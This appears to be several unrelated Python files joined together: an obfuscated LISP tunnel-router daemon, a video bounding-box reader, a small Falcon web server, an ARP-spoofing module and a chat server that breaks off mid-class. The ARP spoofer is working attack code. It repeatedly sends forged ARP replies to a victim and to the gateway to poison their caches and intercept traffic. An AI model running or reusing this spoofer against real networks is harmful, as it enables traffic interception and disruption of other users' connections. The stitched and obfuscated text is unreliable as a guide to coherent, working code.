if 95 - 95: O0 * OoOoOO00 * IiII . ooOoO0o / iIii1I11I1II1
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
if 45 - 45: O0 / i1IIi * oO0o * OoO0O00
if 35 - 35: I1ii11iIi11i / iII111i % I1IiiI + iIii1I11I1II1
if 79 - 79: OoOoOO00 / ooOoO0o
if 77 - 77: Oo0Ooo
if ( pitr ) :
IIi11i11 = ""
i1I1III1i1i = i1I1III1i1i . replace ( "dst " , "" )
if 46 - 46: I1Ii111
if 72 - 72: iII111i * OOooOOo
if 67 - 67: i1IIi
if 5 - 5: II111iiii . OoooooooOO
if 57 - 57: I1IiiI
i1I11IiI1iiII = ii + iIi1Iii111I + IIi11i11 + i1I1III1i1i
i1I11IiI1iiII += I1Iiiiiii
i1I11IiI1iiII += II111iIII1Ii
if 35 - 35: OoooooooOO - I1Ii111 / OoO0O00
lisp . lprint ( "Using pcap filter: '{}'" . format ( i1I11IiI1iiII ) )
return ( i1I11IiI1iiII )
if 50 - 50: OoOoOO00
if 33 - 33: I11i
if 98 - 98: OoOoOO00 % II111iiii
if 95 - 95: iIii1I11I1II1 - I1Ii111 - OOooOOo + I1Ii111 % I1ii11iIi11i . I1IiiI
if 41 - 41: O0 + oO0o . i1IIi - II111iiii * o0oOOo0O0Ooo . OoO0O00
if 68 - 68: o0oOOo0O0Ooo
if 20 - 20: I1Ii111 - I1Ii111
def iIi1 ( device , pfilter , pcap_lock ) :
lisp . lisp_set_exception ( )
if 37 - 37: IiII
pcap_lock . acquire ( )
iI11i = pcappy . open_live ( device , 9000 , 0 , 100 )
pcap_lock . release ( )
if 73 - 73: iII111i * iII111i / ooOoO0o
iI11i . filter = pfilter
iI11i . loop ( - 1 , O0oOOo0o , device )
return
if 43 - 43: I1ii11iIi11i . i1IIi . IiII + O0 * Ii1I * O0
if 41 - 41: I1ii11iIi11i + Ii1I % OoooooooOO . I1ii11iIi11i + iII111i . iII111i
if 31 - 31: i11iIiiIii + II111iiii . iII111i * OoOoOO00
if 66 - 66: OoOoOO00 + i1IIi % II111iiii . O0 * I1ii11iIi11i % I1ii11iIi11i
if 87 - 87: OOooOOo + o0oOOo0O0Ooo . iII111i - OoooooooOO
if 6 - 6: iIii1I11I1II1 * OoooooooOO
if 28 - 28: Oo0Ooo * o0oOOo0O0Ooo / I1Ii111
if 52 - 52: O0 / o0oOOo0O0Ooo % iII111i * I1IiiI % OOooOOo
if 69 - 69: I1ii11iIi11i
def oOOO0ooo ( ) :
global I11
global II1Ii1iI1i
global II1iII1i
if 19 - 19: iII111i - o0oOOo0O0Ooo - Ii1I - OoOoOO00 . iII111i . I1Ii111
lisp . lisp_set_exception ( )
if 48 - 48: iII111i + IiII
if 60 - 60: I11i + iII111i . IiII / i1IIi . iIii1I11I1II1
if 14 - 14: OOooOOo
if 79 - 79: Ii1I
if 76 - 76: iIii1I11I1II1
Ooi111i1iIi1 = [ II1Ii1iI1i , II1Ii1iI1i ,
oO0oIIII ]
lisp . lisp_build_info_requests ( Ooi111i1iIi1 , None , lisp . LISP_CTRL_PORT )
if 95 - 95: OoooooooOO + I11i - I1ii11iIi11i / I1ii11iIi11i . i1IIi . OoooooooOO
if 29 - 29: ooOoO0o - i1IIi . I11i - I1ii11iIi11i + ooOoO0o + OoooooooOO
if 36 - 36: i1IIi / ooOoO0o . iIii1I11I1II1
if 12 - 12: Ii1I
I11 . cancel ( )
I11 = threading . Timer ( lisp . LISP_INFO_INTERVAL ,
oOOO0ooo , [ ] )
I11 . start ( )
return
if 71 - 71: I1IiiI . II111iiii . I1IiiI - ooOoO0o
if 45 - 45: IiII / O0 / OoOoOO00 * OOooOOo
if 18 - 18: iIii1I11I1II1 + OOooOOo + iIii1I11I1II1 . I1ii11iIi11i + I1Ii111 . ooOoO0o
if 7 - 7: I1ii11iIi11i + iIii1I11I1II1 * I11i * I11i / II111iiii - Ii1I
if 65 - 65: oO0o + OoOoOO00 + II111iiii
if 77 - 77: II111iiii
if 50 - 50: O0 . O0 . ooOoO0o % Oo0Ooo
def ooo000oOO ( kv_pair ) :
global II1iII1i
global iiI1iIiI
global I11
if 27 - 27: o0oOOo0O0Ooo * i11iIiiIii * OoO0O00
lispconfig . lisp_map_resolver_command ( kv_pair )
if 92 - 92: Oo0Ooo / i11iIiiIii + I1ii11iIi11i
if ( lisp . lisp_test_mr_timer == None or
lisp . lisp_test_mr_timer . is_alive ( ) == False ) :
lisp . lisp_test_mr_timer = threading . Timer ( 2 , lisp . lisp_test_mr ,
[ II1iII1i , iiI1iIiI ] )
lisp . lisp_test_mr_timer . start ( )
if 87 - 87: OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
I11 = threading . Timer ( 0 , oOOO0ooo , [ ] )
I11 . start ( )
return
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
if 10 - 10: iII111i . i1IIi + Ii1I
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
if 21 - 21: OoOoOO00 - OoooooooOO % i11iIiiIii
if 71 - 71: i1IIi - I11i * I1Ii111 + oO0o - OoO0O00 % I1ii11iIi11i
if 63 - 63: iIii1I11I1II1 + OOooOOo . OoO0O00 / I1IiiI
def oO0O ( kv_pair ) :
lispconfig . lisp_database_mapping_command ( kv_pair )
return
if 26 - 26: iIii1I11I1II1 + i1IIi / OoOoOO00 % I1ii11iIi11i
if 44 - 44: OoooooooOO . II111iiii . OOooOOo % OoooooooOO
if 86 - 86: i11iIiiIii + O0 * IiII - OoO0O00 * OOooOOo + O0
if 95 - 95: iIii1I11I1II1 . I1Ii111 % iII111i - I1Ii111 * II111iiii
if 89 - 89: iII111i . I1IiiI
if 59 - 59: i1IIi % iIii1I11I1II1 + OoooooooOO
if 97 - 97: I1ii11iIi11i / Oo0Ooo + I1Ii111
if 32 - 32: ooOoO0o % I1Ii111 * Oo0Ooo
def O0O000oOo0O ( kv_pair ) :
global i111I
if 82 - 82: IiII
if 86 - 86: Oo0Ooo * II111iiii * O0
if 83 - 83: IiII / I1Ii111
if 64 - 64: OoO0O00 % IiII . I1Ii111 % OoO0O00 + I11i * IiII
if 83 - 83: o0oOOo0O0Ooo % oO0o + I11i % i11iIiiIii + O0
OoOOoooO000 = lisp . lisp_nat_traversal
OoO0o000oOo = lisp . lisp_rloc_probing
if 88 - 88: i1IIi * I1Ii111 * oO0o - ooOoO0o * I11i / OoooooooOO
if 41 - 41: O0 / I1Ii111 + iIii1I11I1II1
if 72 - 72: OoOoOO00 * iIii1I11I1II1 % I11i
if 20 - 20: II111iiii % iIii1I11I1II1 + oO0o * II111iiii * OoO0O00 % OoO0O00
lispconfig . lisp_xtr_command ( kv_pair )
if 15 - 15: oO0o / I1Ii111
if 37 - 37: i11iIiiIii + I1IiiI . OOooOOo % I11i % I11i
if 26 - 26: O0
if 34 - 34: ooOoO0o * I1Ii111
OooOoOO0OO = ( OoOOoooO000 == False and lisp . lisp_nat_traversal and lisp . lisp_rloc_probing )
if 27 - 27: IiII * I1IiiI . iIii1I11I1II1 - iIii1I11I1II1
i111i1I1ii1i = ( OoO0o000oOo == False and lisp . lisp_rloc_probing )
if 100 - 100: IiII . Ii1I - iIii1I11I1II1 . i11iIiiIii / II111iiii
o0oO0OO00oo0o = 0
if ( i111i1I1ii1i ) : o0oO0OO00oo0o = 1
if ( OooOoOO0OO ) : o0oO0OO00oo0o = 5
if 17 - 17: IiII / I1ii11iIi11i - o0oOOo0O0Ooo * I1ii11iIi11i
if ( o0oO0OO00oo0o != 0 ) :
i11i11II11i = [ i111I , i111I ]
lisp . lisp_start_rloc_probe_timer ( o0oO0OO00oo0o , i11i11II11i )
if 9 - 9: OoOoOO00 - I1ii11iIi11i * ooOoO0o . ooOoO0o - I1IiiI
if 74 - 74: I1ii11iIi11i * i11iIiiIii / I1IiiI - O0 . ooOoO0o
if 39 - 39: ooOoO0o / O0 * IiII
if 17 - 17: Ii1I / iIii1I11I1II1 - OoO0O00 + I1IiiI % OOooOOo
if 14 - 14: o0oOOo0O0Ooo % IiII + I1ii11iIi11i + OoO0O00
if 76 - 76: OoO0O00 - i11iIiiIii + OoOoOO00 + OOooOOo / OoooooooOO
if 50 - 50: II111iiii - I1Ii111 + iIii1I11I1II1 + iIii1I11I1II1
if ( lisp . lisp_crypto_ephem_port == None and lisp . lisp_data_plane_security ) :
i1IiII1III = i111I . getsockname ( ) [ 1 ]
lisp . lisp_crypto_ephem_port = i1IiII1III
lisp . lprint ( "Use port {} for lisp-crypto packets" . format ( i1IiII1III ) )
OoooooOo = { "type" : "itr-crypto-port" , "port" : i1IiII1III }
lisp . lisp_write_to_dp_socket ( OoooooOo )
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
if 88 - 88: o0oOOo0O0Ooo
if 1 - 1: OoooooooOO
lisp . lisp_ipc_write_xtr_parameters ( lisp . lisp_debug_logging ,
lisp . lisp_data_plane_logging )
return
if 48 - 48: ooOoO0o * OoOoOO00 - ooOoO0o - OOooOOo + OOooOOo
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
if 3 - 3: OoooooooOO
if 71 - 71: IiII + i1IIi - iII111i - i11iIiiIii . I11i - ooOoO0o
if 85 - 85: I1ii11iIi11i - OoOoOO00 / I1ii11iIi11i + OOooOOo - iII111i
if 49 - 49: OoO0O00 - O0 / OoO0O00 * OoOoOO00 + I1Ii111
if 35 - 35: II111iiii . I1IiiI / i1IIi / I1IiiI * oO0o
if 85 - 85: II111iiii . ooOoO0o % OOooOOo % I11i
def OOo00ooOoO0o ( ipc ) :
i1i1iiIIiiiII , Ii1I1 , OO0ooO0 , OOOoOo00O = ipc . split ( "%" )
OOOoOo00O = int ( OOOoOo00O , 16 )
if 95 - 95: iIii1I11I1II1 . IiII - OoooooooOO * OoO0O00 / o0oOOo0O0Ooo
oOo0OO0o0 = lisp . lisp_get_echo_nonce ( None , OO0ooO0 )
if ( oOo0OO0o0 == None ) : oOo0OO0o0 = lisp . lisp_echo_nonce ( OO0ooO0 )
if 35 - 35: Oo0Ooo . Oo0Ooo % OoooooooOO - Ii1I
if 43 - 43: OoO0O00 % OoO0O00
if 46 - 46: Oo0Ooo % iIii1I11I1II1 . iII111i . O0 * ooOoO0o / OoooooooOO
if 7 - 7: oO0o - O0 * I11i - o0oOOo0O0Ooo - II111iiii
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
if ( Ii1I1 == "R" ) :
oOo0OO0o0 . request_nonce_rcvd = OOOoOo00O
oOo0OO0o0 . last_request_nonce_rcvd = lisp . lisp_get_timestamp ( )
oOo0OO0o0 . echo_nonce_sent = OOOoOo00O
oOo0OO0o0 . last_new_echo_nonce_sent = lisp . lisp_get_timestamp ( )
lisp . lprint ( "Start echo-nonce mode for {}, nonce 0x{}" . format ( lisp . red ( oOo0OO0o0 . rloc_str , False ) , lisp . lisp_hex_string ( OOOoOo00O ) ) )
if 45 - 45: Ii1I - OOooOOo
if 70 - 70: OoO0O00 % I1IiiI / I1IiiI . I11i % ooOoO0o . II111iiii
if 10 - 10: Ii1I - i11iIiiIii . I1ii11iIi11i % i1IIi
if ( Ii1I1 == "E" ) :
oOo0OO0o0 . echo_nonce_rcvd = OOOoOo00O
oOo0OO0o0 . last_echo_nonce_rcvd = lisp . lisp_get_timestamp ( )
if 78 - 78: iIii1I11I1II1 * Oo0Ooo . Oo0Ooo - OOooOOo . iIii1I11I1II1
if ( oOo0OO0o0 . request_nonce_sent == OOOoOo00O ) :
I111I1I = lisp . bold ( "echoed nonce" , False )
lisp . lprint ( "Received {} {} from {}" . format ( I111I1I ,
lisp . lisp_hex_string ( OOOoOo00O ) ,
lisp . red ( oOo0OO0o0 . rloc_str , False ) ) )
if 54 - 54: II111iiii + I11i % I11i % o0oOOo0O0Ooo
oOo0OO0o0 . request_nonce_sent = None
lisp . lprint ( "Stop request-nonce mode for {}" . format ( lisp . red ( oOo0OO0o0 . rloc_str , False ) ) )
if 25 - 25: iII111i - Oo0Ooo
oOo0OO0o0 . last_good_echo_nonce_rcvd = lisp . lisp_get_timestamp ( )
else :
Iii1IIIIIII = "none"
if ( oOo0OO0o0 . request_nonce_sent ) :
Iii1IIIIIII = lisp . lisp_hex_string ( oOo0OO0o0 . request_nonce_sent )
if 27 - 27: OoO0O00 + OoOoOO00 * ooOoO0o
lisp . lprint ( ( "Received echo-nonce 0x{} from {}, but request-" + "nonce is {}" ) . format ( lisp . lisp_hex_string ( OOOoOo00O ) ,
# iIii1I11I1II1 . iIii1I11I1II1 % IiII % i1IIi . OoOoOO00
lisp . red ( oOo0OO0o0 . rloc_str , False ) , Iii1IIIIIII ) )
if 75 - 75: ooOoO0o + OoO0O00 - I1ii11iIi11i . OoooooooOO . ooOoO0o + I1IiiI
if 49 - 49: I1ii11iIi11i . IiII . i1IIi * OoOoOO00 % iIii1I11I1II1
return
if 35 - 35: I1ii11iIi11i + I1Ii111 - OoOoOO00 % oO0o % o0oOOo0O0Ooo % OoOoOO00
if 45 - 45: I1IiiI * OOooOOo % OoO0O00
if 24 - 24: ooOoO0o - I11i * oO0o
if 87 - 87: Ii1I - I1ii11iIi11i % I1ii11iIi11i . oO0o / I1ii11iIi11i
if 6 - 6: OoOoOO00 / iIii1I11I1II1 * OoooooooOO * i11iIiiIii
o0O0OOo0oO = {
"lisp xtr-parameters" : [ O0O000oOo0O , {
"rloc-probing" : [ True , "yes" , "no" ] ,
"nonce-echoing" : [ True , "yes" , "no" ] ,
"data-plane-security" : [ True , "yes" , "no" ] ,
"data-plane-logging" : [ True , "yes" , "no" ] ,
"frame-logging" : [ True , "yes" , "no" ] ,
"flow-logging" : [ True , "yes" , "no" ] ,
"nat-traversal" : [ True , "yes" , "no" ] ,
"checkpoint-map-cache" : [ True , "yes" , "no" ] ,
"ipc-data-plane" : [ True , "yes" , "no" ] ,
"decentralized-push-xtr" : [ True , "yes" , "no" ] ,
"decentralized-pull-xtr-modulus" : [ True , 1 , 0xff ] ,
"decentralized-pull-xtr-dns-suffix" : [ True ] ,
"register-reachable-rtrs" : [ True , "yes" , "no" ] ,
"program-hardware" : [ True , "yes" , "no" ] } ] ,
"lisp interface" : [ lispconfig . lisp_interface_command , {
"interface-name" : [ True ] ,
"device" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"dynamic-eid" : [ True ] ,
"multi-tenant-eid" : [ True ] ,
"lisp-nat" : [ True , "yes" , "no" ] ,
"dynamic-eid-device" : [ True ] ,
"dynamic-eid-timeout" : [ True , 0 , 0xff ] } ] ,
"lisp map-resolver" : [ ooo000oOO , {
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"dns-name" : [ True ] ,
"address" : [ True ] } ] ,
"lisp database-mapping" : [ oO0O , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"secondary-instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"dynamic-eid" : [ True , "yes" , "no" ] ,
"signature-eid" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"address" : [ True ] ,
"interface" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"send-map-request" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp itr-map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp explicit-locator-path" : [ lispconfig . lisp_elp_command , {
"elp-name" : [ False ] ,
"elp-node" : [ ] ,
"address" : [ True ] ,
"probe" : [ True , "yes" , "no" ] ,
"strict" : [ True , "yes" , "no" ] ,
"eid" : [ True , "yes" , "no" ] } ] ,
"lisp replication-list-entry" : [ lispconfig . lisp_rle_command , {
"rle-name" : [ False ] ,
"rle-node" : [ ] ,
"address" : [ True ] ,
"level" : [ True , 0 , 255 ] } ] ,
"lisp geo-coordinates" : [ lispconfig . lisp_geo_command , {
"geo-name" : [ False ] ,
"geo-tag" : [ False ] } ] ,
"show itr-map-cache" : [ IIiiIiI1 , { } ] ,
"show itr-rloc-probing" : [ I1i1iii , { } ] ,
"show itr-keys" : [ oo , { } ] ,
"show itr-dynamic-eid" : [ lispconfig . lisp_show_dynamic_eid_command , { } ]
}
if 42 - 42: II111iiii / O0 . iIii1I11I1II1 / O0 / OoO0O00 / OoooooooOO
if 62 - 62: O0 . Oo0Ooo
if 33 - 33: Oo0Ooo / iIii1I11I1II1 % i1IIi
if 76 - 76: Ii1I + iIii1I11I1II1 + OoOoOO00 . OoO0O00
if 49 - 49: IiII / ooOoO0o / OOooOOo
if 25 - 25: I1IiiI % O0 + i1IIi - ooOoO0o
if ( I111I1Iiii1i ( ) == False ) :
lisp . lprint ( "lisp_itr_startup() failed" )
lisp . lisp_print_banner ( "ITR abnormal exit" )
exit ( 1 )
if 38 - 38: o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + ooOoO0o / i11iIiiIii
if 94 - 94: iII111i - Oo0Ooo + oO0o
O0oooOoO = [ i111I , oO0oIIII ,
II1Ii1iI1i , Oo0oO0oo0oO00 ]
if 62 - 62: OOooOOo / II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
if 2 - 2: i11iIiiIii - I1Ii111 + OoO0O00 % I11i * Ii1I
if 54 - 54: O0 - iII111i . OOooOOo % iII111i + iII111i
if 36 - 36: OOooOOo % i11iIiiIii
Iiii1Ii = True
ooOOo00oo0 = [ i111I ] * 3
IIIII1Ii = [ II1Ii1iI1i ] * 3
if 13 - 13: II111iiii
while ( True ) :
try : o0o000Oo , oO0o0O0o0OO00 , i1i1iiIIiiiII = select . select ( O0oooOoO , [ ] , [ ] )
except : break
if 23 - 23: OoO0O00 + i11iIiiIii
if 20 - 20: I1ii11iIi11i
if 3 - 3: OoO0O00 * i1IIi . I1IiiI . O0 - OoOoOO00
if 81 - 81: I1IiiI - iIii1I11I1II1 / I1IiiI / O0
if ( lisp . lisp_ipc_data_plane and Oo0oO0oo0oO00 in o0o000Oo ) :
lisp . lisp_process_punt ( Oo0oO0oo0oO00 , II1iII1i ,
iiI1iIiI )
if 34 - 34: Ii1I * Ii1I - I1ii11iIi11i - O0 . i11iIiiIii
if 32 - 32: iIii1I11I1II1 . OoO0O00 * oO0o / OOooOOo . II111iiii - Oo0Ooo
if 10 - 10: I1ii11iIi11i / i11iIiiIii - Ii1I + oO0o * I1IiiI
if 94 - 94: I1IiiI + iIii1I11I1II1 / O0 - OoooooooOO % I1ii11iIi11i
if 64 - 64: I11i + OoO0O00
if ( i111I in o0o000Oo ) :
Ii1I1 , i1oOOoo0o0OOOO , i1IiII1III , Ii = lisp . lisp_receive ( ooOOo00oo0 [ 0 ] ,
False )
if ( i1oOOoo0o0OOOO == "" ) : break
if 44 - 44: I1IiiI % Ii1I * I1IiiI . Oo0Ooo + I1ii11iIi11i . OOooOOo
if ( lisp . lisp_is_rloc_probe_reply ( Ii [ 0 ] ) ) :
lisp . lprint ( "ITR ignoring RLOC-probe reply, using pcap" )
continue
if 6 - 6: IiII * OoooooooOO + I1Ii111 / Ii1I
lisp . lisp_parse_packet ( ooOOo00oo0 , Ii , i1oOOoo0o0OOOO , i1IiII1III )
if 35 - 35: ooOoO0o % I1IiiI - ooOoO0o - OoO0O00 - OoooooooOO
if 46 - 46: i1IIi . i1IIi . oO0o / I11i / ooOoO0o
if 34 - 34: OoooooooOO / Oo0Ooo * i11iIiiIii . II111iiii . OoooooooOO
if 59 - 59: i11iIiiIii . OoooooooOO / I11i * I1ii11iIi11i + OoooooooOO
if 3 - 3: i11iIiiIii * Oo0Ooo % iIii1I11I1II1 % I1IiiI * iII111i / OOooOOo
if ( II1Ii1iI1i in o0o000Oo ) :
Ii1I1 , i1oOOoo0o0OOOO , i1IiII1III , Ii = lisp . lisp_receive ( IIIII1Ii [ 0 ] ,
False )
if ( i1oOOoo0o0OOOO == "" ) : break
if 95 - 95: IiII * O0 * I1Ii111 . OoooooooOO % Oo0Ooo + I1ii11iIi11i
if ( lisp . lisp_is_rloc_probe_reply ( Ii [ 0 ] ) ) :
lisp . lprint ( "ITR ignoring RLOC-probe reply, using pcap" )
continue
if 98 - 98: oO0o . OoooooooOO
Oo000 = lisp . lisp_parse_packet ( IIIII1Ii , Ii , i1oOOoo0o0OOOO , i1IiII1III )
if 97 - 97: O0 / OOooOOo + o0oOOo0O0Ooo . oO0o % OoOoOO00 - OoOoOO00
if 33 - 33: I11i % II111iiii + OoO0O00
if 93 - 93: i1IIi . IiII / I1IiiI + IiII
if 58 - 58: I1ii11iIi11i + O0 . Oo0Ooo + OoOoOO00 - OoO0O00 - OoOoOO00
if 41 - 41: Oo0Ooo / i1IIi / Oo0Ooo - iII111i . o0oOOo0O0Ooo
if ( Oo000 ) :
i11i11II11i = [ i111I , i111I ]
lisp . lisp_start_rloc_probe_timer ( 0 , i11i11II11i )
if 65 - 65: O0 * i11iIiiIii . OoooooooOO / I1IiiI / iII111i
if 69 - 69: ooOoO0o % ooOoO0o
if 76 - 76: i11iIiiIii * iII111i / OoO0O00 % I1ii11iIi11i + OOooOOo
if 48 - 48: iIii1I11I1II1 % i1IIi + OoOoOO00 % o0oOOo0O0Ooo
if 79 - 79: OoOoOO00 % I1IiiI % Ii1I / i1IIi % OoO0O00
if 56 - 56: iIii1I11I1II1 - i11iIiiIii * iII111i
if 84 - 84: OOooOOo + Ii1I + o0oOOo0O0Ooo
if ( oO0oIIII in o0o000Oo ) :
Ii1I1 , i1oOOoo0o0OOOO , i1IiII1III , Ii = lisp . lisp_receive ( oO0oIIII , True )
if 33 - 33: Ii1I
if ( i1oOOoo0o0OOOO == "" ) : break
if 93 - 93: ooOoO0o
if ( Ii1I1 == "command" ) :
if ( Ii == "clear" ) :
lisp . lisp_clear_map_cache ( )
continue
if 34 - 34: oO0o - ooOoO0o * Oo0Ooo / o0oOOo0O0Ooo
if ( Ii . find ( "nonce%" ) != - 1 ) :
OOo00ooOoO0o ( Ii )
continue
if 19 - 19: I1ii11iIi11i
lispconfig . lisp_process_command ( oO0oIIII , Ii1I1 ,
Ii , "lisp-itr" , [ o0O0OOo0oO ] )
elif ( Ii1I1 == "api" ) :
lisp . lisp_process_api ( "lisp-itr" , oO0oIIII , Ii )
elif ( Ii1I1 == "data-packet" ) :
IIIii ( Ii , "ipc" )
else :
if ( lisp . lisp_is_rloc_probe_reply ( Ii [ 0 ] ) ) :
lisp . lprint ( "ITR ignoring RLOC-probe request, using pcap" )
continue
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - OoOoOO00 % O0 / II111iiii * i1IIi
lisp . lisp_parse_packet ( II1iII1i , Ii , i1oOOoo0o0OOOO , i1IiII1III )
if 66 - 66: O0
if 52 - 52: OoO0O00 * OoooooooOO
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
if 71 - 71: I1Ii111 - o0oOOo0O0Ooo - OOooOOo
if 28 - 28: iIii1I11I1II1
I1II ( )
lisp . lisp_print_banner ( "ITR normal exit" )
exit ( 0 )
if 7 - 7: o0oOOo0O0Ooo % IiII * OoOoOO00
if 58 - 58: IiII / I11i + II111iiii % iII111i - OoooooooOO
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
main.py | import os
import sys
import struct
import subprocess
from multiprocessing import Process
import errno
import cv2
from boundbox import Box, wrap_box
def setBbox():
cmd = "/home/rbccps2080/projects/prajwal/test/TensorRT-Yolov3/build/runYolov3"
subprocess.Popen(cmd)
def getBbox():
path = "/tmp/fifopipe"
try:
os.mkfifo(path)
except OSError as oe:
if oe.errno != errno.EEXIST:
raise
fifo = os.open(path, os.O_RDONLY)
frame_number = 1
while(True):
videocap = cv2.VideoCapture("latest.mp4")
if (videocap.isOpened() == False):
print("python side ::::::::: Error opening video stream or file")
out = cv2.VideoWriter('outpy.avi',cv2.VideoWriter_fourcc('M','J','P','G'), 20, (1280, 720))
while(videocap.isOpened()):
ret, frame = videocap.read()
if ret == False:
break
try:
head = os.read(fifo, 1)
print("python side ::::::::: value of head in try :: ", head)
# head = sys.stdin.read(1)
except:
print("python side ::::::::: some error :: end??")
sys.exit(0)
head = int.from_bytes(head, "big")
print("python side ::::::::: header length(number of boxes): ", head)
print("python side ::::::::: frame_number :::::::::::::: ", frame_number)
frame_number += 1
if head == 0:
print("python side ::::::::: data :::::::::::::: DATA IS EMPTY")
continue
for i in range(head):
data_byte = os.read(fifo, 24)
print("python side :::::::::::: data_byte value :::::: ", data_byte)
print("python side :::::::::::: data_byte value :::::: ",
len(data_byte))
data = struct.unpack("=iiiiif", data_byte)
print("python side ::::::::: data :::::::::::::: ", data)
data = Box(data)
frame = wrap_box(frame, data)
out.write(frame)
videocap.release()
out.release()
if __name__ == "__main__":
p1 = Process(target=setBbox)
p2 = Process(target=getBbox)
p1.start()
p2.start()
p1.join()
p2.join()
|
server.py | import falcon
import multiprocessing
import pbc.game
from dotenv import load_dotenv
from pathlib import Path
class AnswerResource(object):
def on_get(self, req, res):
"""Handles all get requests"""
res.status = falcon.HTTP_200
res.body = ('Hello, world!')
class StartGameResource(object):
def on_get(self, req, res):
"""Start the game"""
game = pbc.game.Game()
game_proc = multiprocessing.Process(target = game.run, args =())
game_proc.start()
res.status = falcon.HTTP_200
res.body = ('Game started')
app = falcon.API()
app.add_route('/answer', AnswerResource())
app.add_route('/start', StartGameResource())
env_path = Path('.') / '.env'
load_dotenv(dotenv_path=env_path, verbose=True)
|
spoof.py | import time
import threading
from scapy.all import ARP, send # pylint: disable=no-name-in-module
from .host import Host
from evillimiter.common.globals import BROADCAST
class ARPSpoofer(object):
def __init__(self, interface, gateway_ip, gateway_mac):
self.interface = interface
self.gateway_ip = gateway_ip
self.gateway_mac = gateway_mac
# interval in s spoofed ARP packets are sent to targets
self.interval = 2
self._hosts = set()
self._hosts_lock = threading.Lock()
self._running = False
def add(self, host):
with self._hosts_lock:
self._hosts.add(host)
host.spoofed = True
def remove(self, host):
with self._hosts_lock:
self._hosts.discard(host)
self._restore(host)
host.spoofed = False
def start(self):
thread = threading.Thread(target=self._spoof, args=[], daemon=True)
self._running = True
thread.start()
def stop(self):
self._running = False
def _spoof(self):
while self._running:
self._hosts_lock.acquire()
# make a deep copy to reduce lock time
hosts = self._hosts.copy()
self._hosts_lock.release()
for host in hosts:
if not self._running:
return
self._send_spoofed_packets(host)
time.sleep(self.interval)
def _send_spoofed_packets(self, host):
# 2 packets = 1 gateway packet, 1 host packet
packets = [
ARP(op=2, psrc=host.ip, pdst=self.gateway_ip, hwdst=self.gateway_mac),
ARP(op=2, psrc=self.gateway_ip, pdst=host.ip, hwdst=host.mac)
]
[send(x, verbose=0, iface=self.interface) for x in packets]
def _restore(self, host):
"""
Remaps host and gateway to their actual addresses
"""
# 2 packets = 1 gateway packet, 1 host packet
packets = [
ARP(op=2, psrc=host.ip, hwsrc=host.mac, pdst=self.gateway_ip, hwdst=BROADCAST),
ARP(op=2, psrc=self.gateway_ip, hwsrc=self.gateway_mac, pdst=host.ip, hwdst=BROADCAST)
]
[send(x, verbose=0, iface=self.interface, count=3) for x in packets] |
Server.py | import threading
import socket
HOST = ''
PORT = 9000
clients = set()
names = {}
def sendMsg(msg):
for clt in clients:
if clt is not None:
clt.sendall(msg.encode())
def handle(c, address):
name = c.recv(256)
names[address[1]] = name.decode()
c.sendall('Welcome to the server {username}'.format(username=names[address[1]]).encode())
print('Client {username} Connected'.format(username=names[address[1]]))
sendMsg('Client {username} Connected'.format(username=names[address[1]]))
clients.add(c)
while True and c is not None:
try:
data = c.recv(1024)
if data is None:
break
else:
msg = 'Client {username}: '.format(username=names[address[1]]) + data.decode()
sendMsg(msg)
print(msg)
data = None
except:
print('Client {username} Disconnected'.format(username=names[address[1]]))
clients.remove(c)
sendMsg('Client {username} Disconnected'.format(username=names[address[1]]))
del names[address[1]]
c.close()
break
class Server(object):
def __init__(self, hostname, port):
self.hostname = hostname
self.port = port
def start(self):
self.socket = socket.socket()
print(self.hostname)
